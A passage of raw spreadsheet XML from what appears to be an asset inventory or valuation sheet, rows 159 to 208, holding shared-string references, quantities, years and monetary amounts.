      <c r="H159" s="11"/>
      <c r="I159" s="11"/>
      <c r="J159" s="190"/>
      <c r="K159" s="188">
        <v>0</v>
      </c>
      <c r="L159" s="191"/>
    </row>
    <row r="160" customHeight="1" spans="2:12">
      <c r="B160" s="16"/>
      <c r="C160" s="11"/>
      <c r="D160" s="16" t="s">
        <v>2066</v>
      </c>
      <c r="E160" s="16" t="s">
        <v>2266</v>
      </c>
      <c r="F160" s="11"/>
      <c r="G160" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H160" s="16">
        <v>1</v>
      </c>
      <c r="I160" s="11"/>
      <c r="J160" s="190"/>
      <c r="K160" s="188">
        <v>0</v>
      </c>
      <c r="L160" s="246" t="s">
        <v>2264</v>
      </c>
    </row>
    <row r="161" customHeight="1" spans="2:12">
      <c r="B161" s="16"/>
      <c r="C161" s="11"/>
      <c r="D161" s="16" t="s">
        <v>2009</v>
      </c>
      <c r="E161" s="10"/>
      <c r="F161" s="16" t="s">
        <v>2010</v>
      </c>
      <c r="G161" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H161" s="16">
        <v>12</v>
      </c>
      <c r="I161" s="11"/>
      <c r="J161" s="190"/>
      <c r="K161" s="188">
        <v>0</v>
      </c>
      <c r="L161" s="246" t="s">
        <v>2264</v>
      </c>
    </row>
    <row r="162" customHeight="1" spans="2:12">
      <c r="B162" s="16"/>
      <c r="C162" s="11"/>
      <c r="D162" s="16" t="s">
        <v>2013</v>
      </c>
      <c r="E162" s="10"/>
      <c r="F162" s="11"/>
      <c r="G162" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H162" s="16">
        <v>4</v>
      </c>
      <c r="I162" s="11"/>
      <c r="J162" s="190"/>
      <c r="K162" s="188">
        <v>0</v>
      </c>
      <c r="L162" s="246" t="s">
        <v>2264</v>
      </c>
    </row>
    <row r="163" customHeight="1" spans="2:12">
      <c r="B163" s="16"/>
      <c r="C163" s="11"/>
      <c r="D163" s="16" t="s">
        <v>2267</v>
      </c>
      <c r="E163" s="10"/>
      <c r="F163" s="11"/>
      <c r="G163" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H163" s="16">
        <v>1</v>
      </c>
      <c r="I163" s="11"/>
      <c r="J163" s="190"/>
      <c r="K163" s="188">
        <v>0</v>
      </c>
      <c r="L163" s="246" t="s">
        <v>2264</v>
      </c>
    </row>
    <row r="164" customHeight="1" spans="2:12">
      <c r="B164" s="16"/>
      <c r="C164" s="11"/>
      <c r="D164" s="16" t="s">
        <v>2011</v>
      </c>
      <c r="E164" s="10"/>
      <c r="F164" s="11"/>
      <c r="G164" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H164" s="16">
        <v>8</v>
      </c>
      <c r="I164" s="11"/>
      <c r="J164" s="190"/>
      <c r="K164" s="188">
        <v>0</v>
      </c>
      <c r="L164" s="246" t="s">
        <v>2264</v>
      </c>
    </row>
    <row r="165" customHeight="1" spans="2:12">
      <c r="B165" s="16"/>
      <c r="C165" s="11"/>
      <c r="D165" s="16" t="s">
        <v>2106</v>
      </c>
      <c r="E165" s="10"/>
      <c r="F165" s="11"/>
      <c r="G165" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H165" s="16">
        <v>1</v>
      </c>
      <c r="I165" s="11"/>
      <c r="J165" s="190"/>
      <c r="K165" s="188">
        <v>0</v>
      </c>
      <c r="L165" s="246" t="s">
        <v>2264</v>
      </c>
    </row>
    <row r="166" customHeight="1" spans="2:12">
      <c r="B166" s="16">
        <v>121</v>
      </c>
      <c r="C166" s="237" t="s">
        <v>2268</v>
      </c>
      <c r="D166" s="238" t="s">
        <v>2177</v>
      </c>
      <c r="E166" s="238" t="s">
        <v>2269</v>
      </c>
      <c r="F166" s="11"/>
      <c r="G166" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H166" s="11">
        <v>1</v>
      </c>
      <c r="I166" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J166" s="192">
        <v>3500</v>
      </c>
      <c r="K166" s="188">
        <v>140</v>
      </c>
      <c r="L166" s="246" t="s">
        <v>2270</v>
      </c>
    </row>
    <row r="167" customHeight="1" spans="2:12">
      <c r="B167" s="16">
        <v>122</v>
      </c>
      <c r="C167" s="237" t="s">
        <v>2271</v>
      </c>
      <c r="D167" s="238" t="s">
        <v>2272</v>
      </c>
      <c r="E167" s="238" t="s">
        <v>2273</v>
      </c>
      <c r="F167" s="11"/>
      <c r="G167" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H167" s="11">
        <v>2</v>
      </c>
      <c r="I167" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J167" s="192">
        <v>17000</v>
      </c>
      <c r="K167" s="188">
        <v>680</v>
      </c>
      <c r="L167" s="246" t="s">
        <v>2270</v>
      </c>
    </row>
    <row r="168" customHeight="1" spans="2:12">
      <c r="B168" s="16">
        <v>123</v>
      </c>
      <c r="C168" s="237" t="s">
        <v>2274</v>
      </c>
      <c r="D168" s="238" t="s">
        <v>2275</v>
      </c>
      <c r="E168" s="238" t="s">
        <v>2276</v>
      </c>
      <c r="F168" s="11"/>
      <c r="G168" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H168" s="11">
        <v>6</v>
      </c>
      <c r="I168" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J168" s="192">
        <v>5500</v>
      </c>
      <c r="K168" s="188">
        <v>1200</v>
      </c>
      <c r="L168" s="246" t="s">
        <v>2270</v>
      </c>
    </row>
    <row r="169" customHeight="1" spans="2:12">
      <c r="B169" s="16">
        <v>124</v>
      </c>
      <c r="C169" s="237" t="s">
        <v>2277</v>
      </c>
      <c r="D169" s="238" t="s">
        <v>2065</v>
      </c>
      <c r="E169" s="238" t="s">
        <v>2278</v>
      </c>
      <c r="F169" s="11"/>
      <c r="G169" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H169" s="11">
        <v>1</v>
      </c>
      <c r="I169" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J169" s="192">
        <v>7900</v>
      </c>
      <c r="K169" s="188">
        <v>316</v>
      </c>
      <c r="L169" s="246" t="s">
        <v>2270</v>
      </c>
    </row>
    <row r="170" customHeight="1" spans="2:12">
      <c r="B170" s="16">
        <v>125</v>
      </c>
      <c r="C170" s="16"/>
      <c r="D170" s="10" t="s">
        <v>2124</v>
      </c>
      <c r="E170" s="10"/>
      <c r="F170" s="11"/>
      <c r="G170" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H170" s="11">
        <v>1</v>
      </c>
      <c r="I170" s="11"/>
      <c r="J170" s="190"/>
      <c r="K170" s="188">
        <v>400</v>
      </c>
      <c r="L170" s="246" t="s">
        <v>2270</v>
      </c>
    </row>
    <row r="171" customHeight="1" spans="2:12">
      <c r="B171" s="16">
        <v>126</v>
      </c>
      <c r="C171" s="237" t="s">
        <v>2279</v>
      </c>
      <c r="D171" s="238" t="s">
        <v>2280</v>
      </c>
      <c r="E171" s="238" t="s">
        <v>2281</v>
      </c>
      <c r="F171" s="11"/>
      <c r="G171" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H171" s="11">
        <v>1</v>
      </c>
      <c r="I171" s="237" t="s">
        <v>2282</v>
      </c>
      <c r="J171" s="192">
        <v>14358.97</v>
      </c>
      <c r="K171" s="188">
        <v>1144</v>
      </c>
      <c r="L171" s="246" t="s">
        <v>2283</v>
      </c>
    </row>
    <row r="172" customHeight="1" spans="2:12">
      <c r="B172" s="16">
        <v>127</v>
      </c>
      <c r="C172" s="237" t="s">
        <v>2284</v>
      </c>
      <c r="D172" s="238" t="s">
        <v>2285</v>
      </c>
      <c r="E172" s="238" t="s">
        <v>2286</v>
      </c>
      <c r="F172" s="11"/>
      <c r="G172" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H172" s="11">
        <v>1</v>
      </c>
      <c r="I172" s="237" t="s">
        <v>2282</v>
      </c>
      <c r="J172" s="192">
        <v>7863.25</v>
      </c>
      <c r="K172" s="188">
        <v>624</v>
      </c>
      <c r="L172" s="246" t="s">
        <v>2283</v>
      </c>
    </row>
    <row r="173" customHeight="1" spans="2:12">
      <c r="B173" s="16">
        <v>128</v>
      </c>
      <c r="C173" s="237" t="s">
        <v>2287</v>
      </c>
      <c r="D173" s="239" t="s">
        <v>2288</v>
      </c>
      <c r="E173" s="180"/>
      <c r="F173" s="180"/>
      <c r="G173" s="11" t="s">
        <v>466</v>
      </c>
      <c r="H173" s="11">
        <v>1</v>
      </c>
      <c r="I173" s="242" t="s">
        <v>437</v>
      </c>
      <c r="J173" s="100">
        <v>290598.32</v>
      </c>
      <c r="K173" s="188">
        <v>92960</v>
      </c>
      <c r="L173" s="239" t="s">
        <v>2289</v>
      </c>
    </row>
    <row r="174" customHeight="1" spans="2:12">
      <c r="B174" s="16">
        <v>129</v>
      </c>
      <c r="C174" s="237" t="s">
        <v>2290</v>
      </c>
      <c r="D174" s="238" t="s">
        <v>2291</v>
      </c>
      <c r="E174" s="10"/>
      <c r="F174" s="11"/>
      <c r="G174" s="16" t="s">
        <v>592</v>
      </c>
      <c r="H174" s="11">
        <v>1</v>
      </c>
      <c r="I174" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J174" s="192">
        <v>279111</v>
      </c>
      <c r="K174" s="188">
        <v>11164</v>
      </c>
      <c r="L174" s="246" t="s">
        <v>1784</v>
      </c>
    </row>
    <row r="175" customHeight="1" spans="2:12">
      <c r="B175" s="16"/>
      <c r="C175" s="11"/>
      <c r="D175" s="10" t="s">
        <v>2133</v>
      </c>
      <c r="E175" s="10"/>
      <c r="F175" s="11"/>
      <c r="G175" s="16"/>
      <c r="H175" s="11"/>
      <c r="I175" s="11"/>
      <c r="J175" s="190"/>
      <c r="K175" s="188">
        <v>0</v>
      </c>
      <c r="L175" s="191"/>
    </row>
    <row r="176" customHeight="1" spans="2:12">
      <c r="B176" s="16"/>
      <c r="C176" s="11"/>
      <c r="D176" s="10" t="s">
        <v>2292</v>
      </c>
      <c r="E176" s="10"/>
      <c r="F176" s="11" t="s">
        <v>2293</v>
      </c>
      <c r="G176" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H176" s="11">
        <v>1</v>
      </c>
      <c r="I176" s="11"/>
      <c r="J176" s="190"/>
      <c r="K176" s="188">
        <v>0</v>
      </c>
      <c r="L176" s="191"/>
    </row>
    <row r="177" customHeight="1" spans="2:12">
      <c r="B177" s="16"/>
      <c r="C177" s="11"/>
      <c r="D177" s="10" t="s">
        <v>2009</v>
      </c>
      <c r="E177" s="10"/>
      <c r="F177" s="11" t="s">
        <v>1895</v>
      </c>
      <c r="G177" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H177" s="11">
        <v>17</v>
      </c>
      <c r="I177" s="11"/>
      <c r="J177" s="190"/>
      <c r="K177" s="188">
        <v>0</v>
      </c>
      <c r="L177" s="191"/>
    </row>
    <row r="178" customHeight="1" spans="2:12">
      <c r="B178" s="16"/>
      <c r="C178" s="11"/>
      <c r="D178" s="10" t="s">
        <v>2013</v>
      </c>
      <c r="E178" s="10"/>
      <c r="F178" s="11" t="s">
        <v>1895</v>
      </c>
      <c r="G178" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H178" s="11">
        <v>3</v>
      </c>
      <c r="I178" s="11"/>
      <c r="J178" s="190"/>
      <c r="K178" s="188">
        <v>0</v>
      </c>
      <c r="L178" s="191"/>
    </row>
    <row r="179" customHeight="1" spans="2:12">
      <c r="B179" s="16"/>
      <c r="C179" s="11"/>
      <c r="D179" s="10" t="s">
        <v>1962</v>
      </c>
      <c r="E179" s="10"/>
      <c r="F179" s="11" t="s">
        <v>2294</v>
      </c>
      <c r="G179" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H179" s="11">
        <v>5</v>
      </c>
      <c r="I179" s="11"/>
      <c r="J179" s="190"/>
      <c r="K179" s="188">
        <v>0</v>
      </c>
      <c r="L179" s="191"/>
    </row>
    <row r="180" customHeight="1" spans="2:12">
      <c r="B180" s="16"/>
      <c r="C180" s="11"/>
      <c r="D180" s="10" t="s">
        <v>2011</v>
      </c>
      <c r="E180" s="10" t="s">
        <v>1960</v>
      </c>
      <c r="F180" s="11" t="s">
        <v>1263</v>
      </c>
      <c r="G180" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H180" s="11">
        <v>1</v>
      </c>
      <c r="I180" s="11"/>
      <c r="J180" s="190"/>
      <c r="K180" s="188">
        <v>0</v>
      </c>
      <c r="L180" s="191"/>
    </row>
    <row r="181" customHeight="1" spans="2:12">
      <c r="B181" s="16">
        <v>130</v>
      </c>
      <c r="C181" s="237" t="s">
        <v>2295</v>
      </c>
      <c r="D181" s="238" t="s">
        <v>2296</v>
      </c>
      <c r="E181" s="10"/>
      <c r="F181" s="11"/>
      <c r="G181" s="16" t="s">
        <v>592</v>
      </c>
      <c r="H181" s="11">
        <v>1</v>
      </c>
      <c r="I181" s="237" t="s">
        <v>748</v>
      </c>
      <c r="J181" s="192">
        <v>325000</v>
      </c>
      <c r="K181" s="188">
        <v>26000</v>
      </c>
      <c r="L181" s="246" t="s">
        <v>1784</v>
      </c>
    </row>
    <row r="182" customHeight="1" spans="2:12">
      <c r="B182" s="16"/>
      <c r="C182" s="11"/>
      <c r="D182" s="10" t="s">
        <v>2133</v>
      </c>
      <c r="E182" s="10"/>
      <c r="F182" s="11"/>
      <c r="G182" s="16"/>
      <c r="H182" s="11"/>
      <c r="I182" s="11"/>
      <c r="J182" s="190"/>
      <c r="K182" s="188">
        <v>0</v>
      </c>
      <c r="L182" s="191"/>
    </row>
    <row r="183" customHeight="1" spans="2:12">
      <c r="B183" s="16"/>
      <c r="C183" s="11"/>
      <c r="D183" s="10" t="s">
        <v>2297</v>
      </c>
      <c r="E183" s="10"/>
      <c r="F183" s="11"/>
      <c r="G183" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H183" s="11">
        <v>1</v>
      </c>
      <c r="I183" s="11"/>
      <c r="J183" s="190"/>
      <c r="K183" s="188">
        <v>0</v>
      </c>
      <c r="L183" s="191" t="s">
        <v>2298</v>
      </c>
    </row>
    <row r="184" customHeight="1" spans="2:12">
      <c r="B184" s="16"/>
      <c r="C184" s="11"/>
      <c r="D184" s="10" t="s">
        <v>2013</v>
      </c>
      <c r="E184" s="10"/>
      <c r="F184" s="11" t="s">
        <v>2160</v>
      </c>
      <c r="G184" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H184" s="11">
        <v>24</v>
      </c>
      <c r="I184" s="11"/>
      <c r="J184" s="190"/>
      <c r="K184" s="188">
        <v>0</v>
      </c>
      <c r="L184" s="191"/>
    </row>
    <row r="185" customHeight="1" spans="2:12">
      <c r="B185" s="16">
        <v>131</v>
      </c>
      <c r="C185" s="237" t="s">
        <v>2299</v>
      </c>
      <c r="D185" s="10" t="s">
        <v>2300</v>
      </c>
      <c r="E185" s="10" t="s">
        <v>2301</v>
      </c>
      <c r="F185" s="11"/>
      <c r="G185" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H185" s="180">
        <v>10</v>
      </c>
      <c r="I185" s="11" t="s">
        <v>2302</v>
      </c>
      <c r="J185" s="190">
        <v>89500</v>
      </c>
      <c r="K185" s="188">
        <v>6720</v>
      </c>
      <c r="L185" s="191" t="s">
        <v>1784</v>
      </c>
    </row>
    <row r="186" customHeight="1" spans="2:12">
      <c r="B186" s="16">
        <v>132</v>
      </c>
      <c r="C186" s="237" t="s">
        <v>2303</v>
      </c>
      <c r="D186" s="238" t="s">
        <v>2304</v>
      </c>
      <c r="E186" s="238" t="s">
        <v>2305</v>
      </c>
      <c r="F186" s="11"/>
      <c r="G186" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H186" s="11">
        <v>1</v>
      </c>
      <c r="I186" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J186" s="192">
        <v>45000</v>
      </c>
      <c r="K186" s="188">
        <v>1800</v>
      </c>
      <c r="L186" s="246" t="s">
        <v>2306</v>
      </c>
    </row>
    <row r="187" customHeight="1" spans="2:12">
      <c r="B187" s="16">
        <v>133</v>
      </c>
      <c r="C187" s="237" t="s">
        <v>2307</v>
      </c>
      <c r="D187" s="238" t="s">
        <v>2308</v>
      </c>
      <c r="E187" s="238" t="s">
        <v>2309</v>
      </c>
      <c r="F187" s="11" t="s">
        <v>1112</v>
      </c>
      <c r="G187" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H187" s="11">
        <v>1</v>
      </c>
      <c r="I187" s="237" t="s">
        <v>1497</v>
      </c>
      <c r="J187" s="192">
        <v>4500</v>
      </c>
      <c r="K187" s="188">
        <v>40</v>
      </c>
      <c r="L187" s="246" t="s">
        <v>2306</v>
      </c>
    </row>
    <row r="188" customHeight="1" spans="2:12">
      <c r="B188" s="16">
        <v>134</v>
      </c>
      <c r="C188" s="237" t="s">
        <v>2310</v>
      </c>
      <c r="D188" s="238" t="s">
        <v>2311</v>
      </c>
      <c r="E188" s="238" t="s">
        <v>2312</v>
      </c>
      <c r="F188" s="11"/>
      <c r="G188" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H188" s="11">
        <v>1</v>
      </c>
      <c r="I188" s="237" t="s">
        <v>1125</v>
      </c>
      <c r="J188" s="192">
        <v>150000</v>
      </c>
      <c r="K188" s="188">
        <v>24000</v>
      </c>
      <c r="L188" s="246" t="s">
        <v>2306</v>
      </c>
    </row>
    <row r="189" customHeight="1" spans="2:12">
      <c r="B189" s="16">
        <v>135</v>
      </c>
      <c r="C189" s="237" t="s">
        <v>2313</v>
      </c>
      <c r="D189" s="238" t="s">
        <v>1962</v>
      </c>
      <c r="E189" s="238" t="s">
        <v>2181</v>
      </c>
      <c r="F189" s="16"/>
      <c r="G189" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H189" s="11">
        <v>1</v>
      </c>
      <c r="I189" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J189" s="192">
        <v>6000</v>
      </c>
      <c r="K189" s="188">
        <v>0</v>
      </c>
      <c r="L189" s="239" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="190" customHeight="1" spans="2:12">
      <c r="B190" s="16">
        <v>136</v>
      </c>
      <c r="C190" s="237" t="s">
        <v>2314</v>
      </c>
      <c r="D190" s="238" t="s">
        <v>2065</v>
      </c>
      <c r="E190" s="238" t="s">
        <v>2185</v>
      </c>
      <c r="F190" s="11"/>
      <c r="G190" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H190" s="11">
        <v>2</v>
      </c>
      <c r="I190" s="247" t="s">
        <v>965</v>
      </c>
      <c r="J190" s="195">
        <v>23000</v>
      </c>
      <c r="K190" s="188">
        <v>920</v>
      </c>
      <c r="L190" s="246" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="191" customHeight="1" spans="2:12">
      <c r="B191" s="16">
        <v>137</v>
      </c>
      <c r="C191" s="11"/>
      <c r="D191" s="10" t="s">
        <v>2057</v>
      </c>
      <c r="E191" s="10"/>
      <c r="F191" s="11"/>
      <c r="G191" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H191" s="11">
        <v>1</v>
      </c>
      <c r="I191" s="11"/>
      <c r="J191" s="190"/>
      <c r="K191" s="188">
        <v>400</v>
      </c>
      <c r="L191" s="246" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="192" customHeight="1" spans="2:12">
      <c r="B192" s="16">
        <v>138</v>
      </c>
      <c r="C192" s="11"/>
      <c r="D192" s="10" t="s">
        <v>2126</v>
      </c>
      <c r="E192" s="10"/>
      <c r="F192" s="11"/>
      <c r="G192" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H192" s="11">
        <v>1</v>
      </c>
      <c r="I192" s="11"/>
      <c r="J192" s="190"/>
      <c r="K192" s="188">
        <v>80</v>
      </c>
      <c r="L192" s="246" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="193" customHeight="1" spans="2:12">
      <c r="B193" s="16">
        <v>139</v>
      </c>
      <c r="C193" s="11"/>
      <c r="D193" s="10" t="s">
        <v>2037</v>
      </c>
      <c r="E193" s="10"/>
      <c r="F193" s="11"/>
      <c r="G193" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H193" s="11">
        <v>10</v>
      </c>
      <c r="I193" s="11"/>
      <c r="J193" s="190"/>
      <c r="K193" s="188">
        <v>400</v>
      </c>
      <c r="L193" s="246" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="194" customHeight="1" spans="2:12">
      <c r="B194" s="16">
        <v>140</v>
      </c>
      <c r="C194" s="16"/>
      <c r="D194" s="10" t="s">
        <v>2315</v>
      </c>
      <c r="E194" s="10"/>
      <c r="F194" s="11"/>
      <c r="G194" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H194" s="11">
        <v>2</v>
      </c>
      <c r="I194" s="11">
        <v>2013</v>
      </c>
      <c r="J194" s="190"/>
      <c r="K194" s="188">
        <v>6000</v>
      </c>
      <c r="L194" s="246" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="195" customHeight="1" spans="2:12">
      <c r="B195" s="16">
        <v>141</v>
      </c>
      <c r="C195" s="237" t="s">
        <v>2316</v>
      </c>
      <c r="D195" s="238" t="s">
        <v>2317</v>
      </c>
      <c r="E195" s="238" t="s">
        <v>2318</v>
      </c>
      <c r="F195" s="11"/>
      <c r="G195" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H195" s="11">
        <v>12</v>
      </c>
      <c r="I195" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J195" s="190">
        <v>900</v>
      </c>
      <c r="K195" s="188">
        <v>216</v>
      </c>
      <c r="L195" s="246" t="s">
        <v>1824</v>
      </c>
    </row>
    <row r="196" customHeight="1" spans="2:12">
      <c r="B196" s="16">
        <v>142</v>
      </c>
      <c r="C196" s="237" t="s">
        <v>2319</v>
      </c>
      <c r="D196" s="238" t="s">
        <v>2320</v>
      </c>
      <c r="E196" s="238" t="s">
        <v>2321</v>
      </c>
      <c r="F196" s="11"/>
      <c r="G196" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H196" s="11">
        <v>1</v>
      </c>
      <c r="I196" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J196" s="190">
        <v>700</v>
      </c>
      <c r="K196" s="188">
        <v>28</v>
      </c>
      <c r="L196" s="246" t="s">
        <v>1824</v>
      </c>
    </row>
    <row r="197" customHeight="1" spans="2:12">
      <c r="B197" s="16">
        <v>143</v>
      </c>
      <c r="C197" s="237" t="s">
        <v>2322</v>
      </c>
      <c r="D197" s="238" t="s">
        <v>1952</v>
      </c>
      <c r="E197" s="238" t="s">
        <v>2248</v>
      </c>
      <c r="F197" s="11"/>
      <c r="G197" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H197" s="11">
        <v>2</v>
      </c>
      <c r="I197" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J197" s="192">
        <v>10000</v>
      </c>
      <c r="K197" s="188">
        <v>400</v>
      </c>
      <c r="L197" s="246" t="s">
        <v>1824</v>
      </c>
    </row>
    <row r="198" customHeight="1" spans="2:12">
      <c r="B198" s="16">
        <v>144</v>
      </c>
      <c r="C198" s="237" t="s">
        <v>2323</v>
      </c>
      <c r="D198" s="238" t="s">
        <v>2324</v>
      </c>
      <c r="E198" s="238" t="s">
        <v>1943</v>
      </c>
      <c r="F198" s="16"/>
      <c r="G198" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H198" s="11">
        <v>1</v>
      </c>
      <c r="I198" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J198" s="192">
        <v>6200</v>
      </c>
      <c r="K198" s="188">
        <v>0</v>
      </c>
      <c r="L198" s="239" t="s">
        <v>2325</v>
      </c>
    </row>
    <row r="199" customHeight="1" spans="2:12">
      <c r="B199" s="16">
        <v>145</v>
      </c>
      <c r="C199" s="16"/>
      <c r="D199" s="10" t="s">
        <v>2106</v>
      </c>
      <c r="E199" s="10"/>
      <c r="F199" s="11"/>
      <c r="G199" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H199" s="11">
        <v>1</v>
      </c>
      <c r="I199" s="182">
        <v>2005</v>
      </c>
      <c r="J199" s="193"/>
      <c r="K199" s="188">
        <v>400</v>
      </c>
      <c r="L199" s="246" t="s">
        <v>2326</v>
      </c>
    </row>
    <row r="200" customHeight="1" spans="2:12">
      <c r="B200" s="16">
        <v>146</v>
      </c>
      <c r="C200" s="237" t="s">
        <v>2327</v>
      </c>
      <c r="D200" s="238" t="s">
        <v>2328</v>
      </c>
      <c r="E200" s="238" t="s">
        <v>2329</v>
      </c>
      <c r="F200" s="11"/>
      <c r="G200" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H200" s="11">
        <v>1</v>
      </c>
      <c r="I200" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J200" s="192">
        <v>2900</v>
      </c>
      <c r="K200" s="188">
        <v>116</v>
      </c>
      <c r="L200" s="246" t="s">
        <v>2330</v>
      </c>
    </row>
    <row r="201" customHeight="1" spans="2:12">
      <c r="B201" s="16">
        <v>147</v>
      </c>
      <c r="C201" s="237" t="s">
        <v>2331</v>
      </c>
      <c r="D201" s="238" t="s">
        <v>2050</v>
      </c>
      <c r="E201" s="238" t="s">
        <v>2051</v>
      </c>
      <c r="F201" s="11"/>
      <c r="G201" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H201" s="11">
        <v>2</v>
      </c>
      <c r="I201" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J201" s="192">
        <v>16500</v>
      </c>
      <c r="K201" s="188">
        <v>660</v>
      </c>
      <c r="L201" s="246" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="202" customHeight="1" spans="2:12">
      <c r="B202" s="16">
        <v>148</v>
      </c>
      <c r="C202" s="237" t="s">
        <v>2332</v>
      </c>
      <c r="D202" s="238" t="s">
        <v>2317</v>
      </c>
      <c r="E202" s="238" t="s">
        <v>2318</v>
      </c>
      <c r="F202" s="11"/>
      <c r="G202" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H202" s="11">
        <v>14</v>
      </c>
      <c r="I202" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J202" s="190">
        <v>900</v>
      </c>
      <c r="K202" s="188">
        <v>252</v>
      </c>
      <c r="L202" s="246" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="203" customHeight="1" spans="2:12">
      <c r="B203" s="16">
        <v>149</v>
      </c>
      <c r="C203" s="237" t="s">
        <v>2333</v>
      </c>
      <c r="D203" s="238" t="s">
        <v>2334</v>
      </c>
      <c r="E203" s="238" t="s">
        <v>2218</v>
      </c>
      <c r="F203" s="16"/>
      <c r="G203" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H203" s="11">
        <v>1</v>
      </c>
      <c r="I203" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J203" s="190">
        <v>750</v>
      </c>
      <c r="K203" s="188">
        <v>0</v>
      </c>
      <c r="L203" s="239" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="204" customHeight="1" spans="2:12">
      <c r="B204" s="16">
        <v>150</v>
      </c>
      <c r="C204" s="237" t="s">
        <v>2335</v>
      </c>
      <c r="D204" s="238" t="s">
        <v>2336</v>
      </c>
      <c r="E204" s="238" t="s">
        <v>2196</v>
      </c>
      <c r="F204" s="11"/>
      <c r="G204" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H204" s="11">
        <v>3</v>
      </c>
      <c r="I204" s="247" t="s">
        <v>229</v>
      </c>
      <c r="J204" s="195">
        <v>15300</v>
      </c>
      <c r="K204" s="188">
        <v>1836</v>
      </c>
      <c r="L204" s="246" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="205" customHeight="1" spans="2:12">
      <c r="B205" s="16">
        <v>151</v>
      </c>
      <c r="C205" s="237" t="s">
        <v>2337</v>
      </c>
      <c r="D205" s="238" t="s">
        <v>2164</v>
      </c>
      <c r="E205" s="238" t="s">
        <v>2338</v>
      </c>
      <c r="F205" s="11"/>
      <c r="G205" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H205" s="11">
        <v>2</v>
      </c>
      <c r="I205" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J205" s="192">
        <v>11600</v>
      </c>
      <c r="K205" s="188">
        <v>464</v>
      </c>
      <c r="L205" s="246" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="206" s="175" customFormat="1" customHeight="1" spans="2:12">
      <c r="B206" s="16">
        <v>152</v>
      </c>
      <c r="C206" s="237" t="s">
        <v>2339</v>
      </c>
      <c r="D206" s="238" t="s">
        <v>1962</v>
      </c>
      <c r="E206" s="238" t="s">
        <v>2340</v>
      </c>
      <c r="F206" s="11"/>
      <c r="G206" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H206" s="11">
        <v>1</v>
      </c>
      <c r="I206" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J206" s="192">
        <v>4450</v>
      </c>
      <c r="K206" s="188">
        <v>178</v>
      </c>
      <c r="L206" s="246" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="207" customHeight="1" spans="2:12">
      <c r="B207" s="16">
        <v>153</v>
      </c>
      <c r="C207" s="237" t="s">
        <v>2341</v>
      </c>
      <c r="D207" s="238" t="s">
        <v>1962</v>
      </c>
      <c r="E207" s="238" t="s">
        <v>2342</v>
      </c>
      <c r="F207" s="11"/>
      <c r="G207" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H207" s="11">
        <v>1</v>
      </c>
      <c r="I207" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J207" s="192">
        <v>5400</v>
      </c>
      <c r="K207" s="188">
        <v>216</v>
      </c>
      <c r="L207" s="246" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="208" customHeight="1" spans="2:12">
      <c r="B208" s="16">
        <v>154</v>
      </c>
